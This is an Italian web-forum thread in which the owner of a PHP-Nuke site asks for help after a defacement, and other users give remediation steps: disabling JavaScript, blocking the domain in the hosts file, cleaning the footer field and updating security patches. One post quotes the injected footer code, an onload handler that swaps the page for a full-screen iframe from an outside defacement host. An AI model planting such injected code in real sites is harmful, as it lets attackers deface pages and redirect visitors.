Mi hanno bucato il sito.....Aiuto!!!

Salve a tutti..ispero che questa sia la sezione giusta x postare sennò chiedo scusa in anticipo!!
Il titolo del topic è alquanto esplicativo

www.catproduction.altervista.org

mi hanno bucato il sito..vi prego...cè modo x rimediare..?il backup del database non lo faccio da un bel po di tempo..spero nn sia successo l irreparabile..cè modo x rintracciare l ip del simpaticone? avevo messo sul sito un modulo antihacker ma ora nn ricordo come si kiama..si vede che non è servito...

Help me please....

Ps non è stato modificato nel il nick nel l'account xkè riesco benissimo tramite ftp ad entrare...

[Gianluca]

Il sito web si vede normalmente, è stato già ripristinato?

In ogni modo AlterVista offre un backup settimanale del database mysql (automatico), vedi sezione novità del forum, chiaramente se non aggiornerai gli scripts vulnerabili l'episodio è destinato a ripetersi.

[Taitaonline]

No, Gianluca... Non so quanto tu sei rimasto sulla Home ma, dopo 30 secondi (o giù di lì) la stessa scompare e appare una pagina dove appunto è segnalato il danno.

[EDIT]
Attenzione: non provate a cliccare su quella pagina che alla fine vi impalla il browser ! (almeno a me così è successo) ... Chiudete tramite la X rossa.

[chrisbiro]

.... si praticamente è impostato una sepece di redirect che ti porta su una pagina con la scritta a cascata con la seguente dicitura "Net Hakers".

allora...qualcuno sa come potrei riparare....

il tipo ha inserito

Codice:

<body topmargin=0 leftmargin=6 onload="document.body.innerHTML='<iframe width=100% height=100% src=http://nethacker.vilabol.uol.com.br//INDEX.htm></iframe>';">

appena sopra il footer

disabilitando il javascript, rendi innocua tutta la baracca e hai tempo di sistemare.
Dovresti cercare quale template è stato modificato (probabilmente il footer o quello globale)

mavericck

dove posso trovare una guida a riguardo..in realtà non tocco php&simili da una vita..e se prima ero un niubbo con qlk conoscenza...ora non ricordo + nulla...
se qualcuno mi potesse dare una mano mi farebbe piacere..so che del mio piacere non ve ne fate un kakkioXD xò lo chiedo lo stesso;p

Eh..io lo farei volentieri, ma sarebbe da vedere la struttura del sito..

ma in pratica cosa ha esattamente toccato?come posso fare a capirlo?

[Evcz]

secondo me ti ha semplicemente modificato il campo sql relativo al codice da aggiungere al footer...

se non vuoi installare cose varie sul tuo pc puoi seguire due bassi:

0) chiudere il browser

1) modificare con notepad il file
c:\windows\system32\drivers\etc\hosts
aggiungendo alla fine la riga:
127.0.0.1 nethacker.vilabol.uol.com.br

2) aprire il browser, andare sul tuo sito, andare nell'amministrazione -> preferenze e modificare i campi relativi al footer (sono 3 campi mi pare) togliendo il codice aggiunto dallo script kiddie

:)

grazie mille!!!!ho disabilitato gli script e ho fatto come mi hai detto..non ricordavo cosa fosse il footer;p..mi hai acceso una lampadina!

ma come è in grado di fare una cosa del genere..può anche entrare e cancellare tutto?come ha fatto a fare quello che ha fatto...-_-"?uso nuckesentinel..questo avrebbe dovuto evitare quello che è successo?
grazie ancora!!

[Evcz]

dipende che versione usi di nukesentinel.. e comunque nukesentinel va considerato un "aggiunta"... l'importante è avere già il nuke corretto...
(e comunque che versione di sentinel: vecchia o recente?)

a partire dall patch di sicurezza di www.nukefixes.com :)

2.2 ...vekkiotta..penso...non tocco il sito da tempo immemorabile...ihihih

[Evcz]

la versione attuale è la 2.4.2... è fatta per phpnuke7... se hai versioni più vecchie devi modificarla...